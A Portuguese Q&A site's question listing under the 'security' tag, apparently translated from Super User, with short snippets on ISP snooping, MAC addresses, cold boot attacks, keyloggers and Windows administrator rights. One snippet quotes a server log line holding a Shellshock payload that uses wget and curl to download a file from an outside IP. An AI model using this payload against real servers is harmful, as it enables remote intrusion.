Perguntas sobre 'security'

Security abrange um amplo conjunto de tópicos, incluindo Usuários, Permissões, Autenticação, Autorização, Atualizações, Firewall, Endurecimento, etc.
5
respostas

Quanta informação o meu ISP pode ver?

É possível para o meu provedor ver as senhas que eu insiro em sites e em programas de bate-papo? E quanto aos sites SSL que começam com https, eles criptografam meu nome de usuário e senha antes de chegar ao ISP?     
11.01.2011 / 23:11
3
respostas

Isso é um ataque ou algo para se preocupar? Trauma pós guerra?

Vi isso no access.log no meu servidor de teste: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.2...
29.09.2014 / 16:26
3
respostas

Sou paranóico ou os firewalls corporativos censuram países inteiros? [fechadas]

Recentemente, no último ano, notei que parece cada vez mais difícil alcançar certos tipos de sites, especialmente aqueles em nações não favorecidas como o Irã ou a Rússia. Por exemplo, só agora tentei acessar o site do Ministério da Defesa da...
29.12.2016 / 00:38
5
respostas

A luz na parte inferior de um mouse ótico pode danificar seus olhos?

Porque eu estou usando um como decoração de árvore de natal e as pessoas olham diretamente para ele todos os dias.     
15.12.2010 / 07:10
3
respostas

Como a exclusividade dos endereços MAC é aplicada?

Novamente, eu li que os dispositivos são identificados exclusivamente por seus endereços MAC. Mas como os endereços MAC são determinados? (E eles nos dizem alguma coisa sobre o dispositivo que eles representam?)     
04.09.2015 / 17:25
3
respostas

As credenciais da Área de Trabalho Remota são seguras na máquina local?

As credenciais da Área de Trabalho Remota são seguras (livremente) na máquina local? Eles não são armazenados como texto claro em qualquer lugar, pelo menos, são eles? Edit: Eu entendo os riscos inerentes de salvar senhas. Certamente, embora...
07.07.2011 / 20:05
8
respostas

keylogger do Linux sem raiz ou sudo! É real?

Alguém no Youtube alega ter um keylogger no Ubuntu que não foi executado nem instalado como root. O link abaixo mostra uma demonstração dele funcionando. link Apesar das afirmações em contrário, essa pessoa poderia tê-lo instalado como r...
24.06.2011 / 14:44
5
respostas

Múltiplas instâncias do conhost.exe

Minha área de trabalho tem duas instâncias de conhost.exe em execução em segundo plano em todos os momentos. Alguns googling trouxeram alguns artigos, como este , mas eles não explicam por que tenho várias instâncias de conhost em execuçã...
14.12.2011 / 22:44
6
respostas

Limpe a RAM no desligamento para evitar que o Cold Boot Attack

Meu sistema é criptografado usando Full Disk Encryption, ou seja, tudo, exceto que / boot é criptografado usando dmcrypt / luks. Estou preocupado com Cold Boot Attacks , onde os pesquisadores demonstrada , esse conteúdo pode ser extraído para...
21.08.2012 / 11:28
2
respostas

Por que preciso executar comandos como administrador se minha conta for membro do grupo de administradores?

Se minha conta já é membro do grupo de administradores, por que algumas funções no Windows 7 exigem que eu as execute como administrador? Eu meio que pensei que isso estava implícito?     
11.02.2010 / 03:49